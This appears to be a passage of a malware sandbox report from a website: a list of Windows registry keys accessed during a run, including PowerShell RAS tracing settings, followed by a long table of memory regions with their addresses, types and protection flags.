HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 182 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1E4000
|
heap
|
page read and write
|
|
|
|
1C308000
|
heap
|
page read and write
|
||
|
22A0000
|
heap
|
page execute and read and write
|
||
|
1C1FE000
|
stack
|
page read and write
|
||
|
1B2D4000
|
heap
|
page read and write
|
||
|
1A979000
|
stack
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
7FE8B5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B700000
|
trusted library allocation
|
page read and write
|
||
|
1C33D000
|
heap
|
page read and write
|
||
|
7FE8B413000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B680000
|
trusted library allocation
|
page read and write
|
||
|
1A7CF000
|
stack
|
page read and write
|
||
|
7FE8B6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A4D8000
|
heap
|
page read and write
|
||
|
1B53F000
|
stack
|
page read and write
|
||
|
124B8000
|
trusted library allocation
|
page read and write
|
||
|
1B16F000
|
stack
|
page read and write
|
||
|
7FE8B430000
|
trusted library allocation
|
page read and write
|
||
|
1249F000
|
trusted library allocation
|
page read and write
|
||
|
1A489000
|
heap
|
page read and write
|
||
|
1C265000
|
heap
|
page read and write
|
||
|
1C67F000
|
stack
|
page read and write
|
||
|
2522000
|
trusted library allocation
|
page read and write
|
||
|
1C105000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE8B630000
|
trusted library allocation
|
page read and write
|
||
|
1C8AE000
|
stack
|
page read and write
|
||
|
1BD0000
|
heap
|
page read and write
|
||
|
7FE8B530000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B414000
|
trusted library allocation
|
page read and write
|
||
|
1B2D0000
|
heap
|
page read and write
|
||
|
7FE8B46C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C274000
|
heap
|
page read and write
|
||
|
1B540000
|
heap
|
page read and write
|
||
|
1C222000
|
heap
|
page read and write
|
||
|
7FE8B5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B6D0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7B0000
|
trusted library allocation
|
page read and write
|
||
|
1C93D000
|
stack
|
page read and write
|
||
|
1C347000
|
heap
|
page read and write
|
||
|
1B3FB000
|
stack
|
page read and write
|
||
|
2A79000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B783000
|
trusted library allocation
|
page read and write
|
||
|
237D000
|
trusted library allocation
|
page read and write
|
||
|
1B90000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B705000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7A4000
|
trusted library allocation
|
page read and write
|
||
|
1C200000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
28E3000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B6E0000
|
trusted library allocation
|
page read and write
|
||
|
1AAEF000
|
stack
|
page read and write
|
||
|
7FE8B5C7000
|
trusted library allocation
|
page read and write
|
||
|
1D30000
|
heap
|
page read and write
|
||
|
1AB98000
|
stack
|
page read and write
|
||
|
7FE8B690000
|
trusted library allocation
|
page read and write
|
||
|
1A9B0000
|
heap
|
page read and write
|
||
|
124AF000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B640000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B614000
|
trusted library allocation
|
page read and write
|
||
|
1A8DD000
|
stack
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DE000
|
heap
|
page read and write
|
||
|
1A52F000
|
heap
|
page read and write
|
||
|
7FE8B7BE000
|
trusted library allocation
|
page read and write
|
||
|
1C16000
|
heap
|
page read and write
|
||
|
2321000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B770000
|
trusted library allocation
|
page read and write
|
||
|
1C720000
|
heap
|
page read and write
|
||
|
1C54E000
|
stack
|
page read and write
|
||
|
1A4BA000
|
heap
|
page read and write
|
||
|
7FE8B4F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B7A9000
|
trusted library allocation
|
page read and write
|
||
|
163000
|
stack
|
page read and write
|
||
|
227F000
|
stack
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
1A4DA000
|
heap
|
page read and write
|
||
|
27E9000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
1C13B000
|
heap
|
page read and write
|
||
|
7FE8B618000
|
trusted library allocation
|
page read and write
|
||
|
1A4F1000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE8B610000
|
trusted library allocation
|
page read and write
|
||
|
22E000
|
heap
|
page read and write
|
||
|
1A434000
|
heap
|
page read and write
|
||
|
1AEB6000
|
heap
|
page read and write
|
||
|
12351000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B41D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B850000
|
trusted library allocation
|
page read and write
|
||
|
28D000
|
heap
|
page read and write
|
||
|
1B40000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1AAA9000
|
stack
|
page read and write
|
||
|
1A430000
|
heap
|
page read and write
|
||
|
7FE8B730000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B670000
|
trusted library allocation
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B4CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A520000
|
heap
|
page read and write
|
||
|
1BD4000
|
heap
|
page read and write
|
||
|
1A6C8000
|
heap
|
page execute and read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
7FE8B660000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7C0000
|
trusted library allocation
|
page read and write
|
||
|
1A859000
|
stack
|
page read and write
|
||
|
1F8000
|
heap
|
page read and write
|
||
|
1CE0000
|
trusted library allocation
|
page read and write
|
||
|
12321000
|
trusted library allocation
|
page read and write
|
||
|
12C000
|
stack
|
page read and write
|
||
|
1A5CA000
|
stack
|
page read and write
|
||
|
1AE80000
|
heap
|
page read and write
|
||
|
7FE8B5F2000
|
trusted library allocation
|
page read and write
|
||
|
28B000
|
heap
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
36E0000
|
trusted library allocation
|
page read and write
|
||
|
1C100000
|
heap
|
page read and write
|
||
|
7FE8B42B000
|
trusted library allocation
|
page read and write
|
||
|
2F2000
|
heap
|
page read and write
|
||
|
7FE8B7C8000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7BA000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7A0000
|
trusted library allocation
|
page read and write
|
||
|
1A492000
|
heap
|
page read and write
|
||
|
7FE8B7B6000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B4C6000
|
trusted library allocation
|
page read and write
|
||
|
326000
|
heap
|
page read and write
|
||
|
7FE8B750000
|
trusted library allocation
|
page read and write
|
||
|
1A6C0000
|
heap
|
page execute and read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
7FE8B420000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
7FE8B710000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A320000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FE8B423000
|
trusted library allocation
|
page read and write
|
||
|
262000
|
heap
|
page read and write
|
||
|
1C258000
|
heap
|
page read and write
|
||
|
7FE8B600000
|
trusted library allocation
|
page execute and read and write
|
||
|
12331000
|
trusted library allocation
|
page read and write
|
||
|
1C733000
|
heap
|
page read and write
|
||
|
3517000
|
trusted library allocation
|
page read and write
|
||
|
1BE0000
|
heap
|
page read and write
|
||
|
1B02F000
|
stack
|
page read and write
|
||
|
1A4000
|
heap
|
page read and write
|
||
|
21FF000
|
stack
|
page read and write
|
||
|
7FE8B75F000
|
trusted library allocation
|
page read and write
|
||
|
1232F000
|
trusted library allocation
|
page read and write
|
||
|
1C2EC000
|
heap
|
page read and write
|
||
|
124B4000
|
trusted library allocation
|
page read and write
|
||
|
1A51E000
|
heap
|
page read and write
|
||
|
7FE8B760000
|
trusted library allocation
|
page read and write
|
||
|
2B17000
|
trusted library allocation
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
1C2A1000
|
heap
|
page read and write
|
||
|
7FE8B4D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
338000
|
heap
|
page read and write
|
||
|
7FE8B5CC000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B780000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B650000
|
trusted library allocation
|
page read and write
|
||
|
124B6000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B720000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5C3000
|
trusted library allocation
|
page read and write
|
||
|
1A6FE000
|
heap
|
page execute and read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
1C31B000
|
heap
|
page read and write
|
||
|
26C1000
|
trusted library allocation
|
page read and write
|
||
|
1B10000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B740000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B6F0000
|
trusted library allocation
|
page read and write
|
||
|
2A45000
|
trusted library allocation
|
page read and write
|
||
|
1B0BF000
|
stack
|
page read and write
|
||
|
7FE8B412000
|
trusted library allocation
|
page read and write
|
||
|
1B24E000
|
stack
|
page read and write
|
||
|
1C291000
|
heap
|
page read and write
|
||
|
7FE8B620000
|
trusted library allocation
|
page read and write
|
There are 173 hidden memdumps, click here to show them.